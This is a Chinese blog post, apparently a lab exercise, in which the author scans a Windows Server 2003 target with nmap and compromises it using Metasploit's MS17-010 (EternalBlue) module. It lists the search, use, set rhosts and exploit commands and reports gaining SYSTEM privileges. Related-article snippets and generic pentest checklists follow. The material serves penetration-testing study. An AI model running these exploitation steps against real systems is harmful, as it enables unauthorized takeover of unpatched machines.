主机 渗透

已于 2024-03-14 20:13:20 修改
阅读量399 收藏 12
点赞数 9
分类专栏: kali 文章标签: 安全 web安全 网络
于 2024-03-14 20:01:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lin__ying/article/details/136690005
版权

1:kali

靶机:Windows Server 2003

端口扫描

1.用nmap端口扫描靶机

nmap -sP 192.168.157.0/24   #扫描192.168.157.0这个网段存活的主机

靶机的IP为192.168.157.130

2

nmap -sV192.168.157.130 -p-   #-sV 参数用于启用版本检测,192.168.157.130 是目标主机的IP地址,-p- 参数用于扫描所有端口

msfconsole

1. ms17_101  

search ms17_010  #询问有关"ms17_010"的漏洞信息

2.use

use 1 #利用1这个模块

3.options

show options   #列出模块所需的各种参数

4.set

set rhosts 192.168.157.130         # 设置远程目标主机的IP地址为192.168.157.130

5.exploit

exploit   #执行攻击

6.获得system32,Windows最高权限

lin___ying
关注
  • 9
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
一次完整的渗透流程
m0_69408815的博客
05-29 1102
一次完整的渗透 攻击机:linux2021 靶机:windows server 2008 R2 文章目录一次完整的渗透攻击机:linux2021 靶机:windows server 2008 R2一、主机发现模块二、 靶机信息收集使用nmap -sV 192.168.93.129三、漏洞利用 ms17-0101.启动msfconsole2.搜索ms17-010漏洞3.利用漏洞4.运行漏洞 一、主机发现模块 nmap,fping,netdiscover都是很好用的扫描存货靶机的工具 nmap扫描存活靶机用
DAY27:主机渗透测试
qq_49433473的博客
08-10 2472
主机渗透测试、主机渗透常用端口、服务默认端口及爆破使用、主机渗透漏洞实例利用 向日葵rce示例,redis弱口令爆破及getshell
渗透入门:DC-1主机渗透详细教学
2301_77472496的博客
09-19 884
DC系列靶场是一组专门为渗透测试而设计的易受攻击的实验室,共有九个靶场。它的目的是让初学者获得渗透测试领域的经验,但是它的难度取决于你的技能和知识,以及你的学习能力。
2024年最全自动化主机渗透工具_shennina,写给正在求职的网络安全开发
最新发布
2401_84239830的博客
05-06 804
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
一套完整的渗透测试流程,值得阅读分享
m0_58477260的博客
03-03 1385
首先客户需要先授权委托,并同意实施方案是进行渗透测试的必要条件。渗透测试首先必须将实施方法、实施时间、实施人员,实施工具等具体的实施方案提交给客户,并得到客户的相应书面委托和授权。应该做到客户对渗透测试所有细节和风险的知晓、所有过程都在客户的控制下进行。信息收集是每一步渗透攻击的前提,通过信息收集可以有针对性地制定模拟攻击测试计划,提高模拟攻击的成功率,同时可以有效的降低攻击测试对系统正常运行造成的不利影响。
渗透测试简述
2201_75362610的博客
03-11 648
渗透测试 (penetration test)并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。渗透测试是根据已知可利用的安全漏洞,去发现是否存在相应的信息资产,通常评估方法对评估结果更具有全面性,渗透测试则更注重安全漏洞的严重性。渗透测试完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节,能直观的让管理员知道自己网络所面临的问题。所以渗透测试是安全评估的方法之一。
Linux 主机超全渗透测试命令汇总
02-12
Linux 主机超全渗透测试命令汇总Linux 主机超全渗透测试命令汇总Linux 主机超全渗透测试命令汇总
fscan内网渗透神器
09-21
它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 2.主要功能 (1)信息搜集: 存活探测...
渗透测试之信息收集1
08-04
渗透测试中,信息收集是非常重要的一步骤,因为只有我们掌握了目标网站或目标主机足够多的信息之后,我们才能更好地对其进行漏洞检测。 信息收集可以分为两种方式:主动和被动。主动信息收集是通过直接访问、扫描...
nmap渗透基础学习
09-08
nmap是一款强大的资源探测工具,可以很好的帮助客户进行主机或网络设备资源探测和漏洞探测,是安全入门好工具
局域网渗透
01-03
局域网渗透软件 usage: hijack <-LVXhefvqsxrkHDtNzoi> <-d dev> <-S interval> |byline|none> <-F jobfile> <-p port> <-IO pcap_dump> <-E quit time> <-b submask> <-m speed> <Source Host> ...
dc-9主机渗透
w1157673482的博客
02-28 4258
DC-9主机渗透测试
红队靶场内网渗透(从DMZ主机渗透到域内机器)
m0_65712192的博客
02-12 3503
红队靶场内网渗透(从DMZ主机渗透到域内机器)
DC-5主机渗透
weixin_65920814的博客
05-25 195
本文详细介绍DC-5主机渗透测试的全部内容
新手如何入门黑客技术,黑客技术入门该学什么?
Karka_的博客
10-11 95
你是否曾经也对黑客技术感兴趣呢?感觉成为黑客是一件很酷的事,那么作为新手如何入门黑客技术,黑客技术入门该学什么呢?其实不管你想在哪个新的领域里有所收获,你需要考虑以下几个问题首先你要想明白为什么学这个,不管是爱好也好,想要把他作为职业也好,只有清楚了自己的目的后才可以持之以恒的去学习,因为计算机领域要学的知识是非常多的,没有长久的坚持是没办法学会的。
内网安全---边界主机渗透
gental_z的博客
01-22 1066
一、简单环境搭建 一台VPS,一台边界服务器OWASP,一台内部服务器Ubuntu Server 网络拓扑如图所示: 关于环境的部署,在OWSAP服务器中设置两张网卡,一张设置外部IP,另外一张设置内部IP。 # 具体配置在/etc/network/interface # 这里设置静态IP auto eth0 iface eth0 inet static address 192.168.101.100 netmask 255.255.255.0 gateway 192.168.101.2 auto et
内网安全---一层主机渗透
gental_z的博客
01-30 659
内网学习小结 一、环境搭建 实验拓扑结构: 在一层内网服务器ubuntu上搭建redis服务器,接下来的实验通过redis未授权漏洞来获取目标主机的权限。 在OWASP服务器上做NAT转换,使Ubuntu Server可以连接外网: # 配置ipables做nat iptables -t nat -A POSTROUTING -s 192.168.100.0/24 -o eth0 -j SNAT --to 192.168.101.100 # 打开Linux内核转发功能 echo "1" > /pr
渗透测试---主机扫描
孤的博客
09-25 1183
ping PING (Packet Internet Groper),因特网包探索器,用于测试网络连接量的程序。Ping发送一个ICMP(Internet Control Messages Protocol)即因特网信报控制协议;回声请求消息给目的地并报告是否收到所希望的ICMPecho (ICMP回声应答)。它是用来检查网络是否通畅或者网络连接速度的命令。 Ping非常容易被屏蔽。 arp-sc...
渗透测试-主机提权
道阻且长,行则将至。
02-07 2338
提权漏洞 漏洞信息 漏洞名称:Microsoft Windows RPCSS服务隔离本地权限提升漏洞 CVE编号:CVE-2009-0079 漏洞编号:MS09-012 发布日期:2009-04-14 微软公布:https://support.microsoft.com/zh-cn/help/956572/ms09-012-description-of-the-security-update-fo...
主机、数据库、中间件、应用的渗透测试用例
06-06
以下是主机、数据库、中间件、应用的渗透测试用例: 1. 主机渗透测试用例: - 端口扫描和服务识别,识别目标主机上运行的服务类型和版本信息。 - 操作系统漏洞扫描,检查主机操作系统是否存在已知的漏洞和弱点。 - 弱口令攻击,尝试使用常见的用户名和密码组合进行登录尝试。 - 恶意软件检测,检查主机上是否存在恶意软件或后门程序。 - 权限提升,尝试提升当前用户的权限,获取系统管理员权限。 - 文件和目录扫描,检查主机上的文件和目录权限配置是否安全。 - 日志审计,检查主机的日志记录和审计机制是否完善。 2. 数据库渗透测试用例: - 数据库服务识别,识别目标数据库服务类型和版本信息。 - 弱口令攻击,尝试使用常见的用户名和密码组合进行登录尝试。 - SQL 注入攻击,测试应用程序是否能够正确过滤和处理用户输入,防止 SQL 注入攻击。 - 数据库权限配置检查,检查数据库用户和角色的权限配置是否安全。 - 数据库备份和恢复测试,测试数据库备份和恢复机制是否正确运行。 - 数据库加密测试,测试数据库加密和解密的安全性和性能。 - 数据库日志审计,检查数据库的日志记录和审计机制是否完善。 3. 中间件渗透测试用例: - 中间件服务识别,识别目标中间件服务类型和版本信息。 - 弱口令攻击,尝试使用常见的用户名和密码组合进行登录尝试。 - 中间件漏洞扫描,检查中间件是否存在已知的漏洞和弱点。 - 会话管理测试,测试会话管理机制的安全性和有效性。 - 加密和解密测试,测试中间件的加密和解密机制的安全性和性能。 - 日志审计,检查中间件的日志记录和审计机制是否完善。 4. 应用渗透测试用例: - 应用服务识别,识别目标应用服务类型和版本信息。 - 目录遍历和文件包含攻击,测试目标应用程序是否存在目录遍历和文件包含漏洞。 - SQL 注入攻击,测试应用程序是否能够正确过滤和处理用户输入,防止 SQL 注入攻击。 - 跨站点脚本攻击 (XSS) 测试,测试应用程序是否能够正确地过滤和处理用户输入,防止 XSS 攻击。 - 跨站点请求伪造 (CSRF) 测试,测试应用程序是否能够正确地防止和检测到 CSRF 攻击。 - 文件上传测试,测试应用程序的文件上传功能是否存在安全漏洞。 - 认证和授权测试,测试应用程序的认证和授权机制是否安全和有效。 - 日志审计,检查应用程序的日志记录和审计机制是否完善。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

lin___ying

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值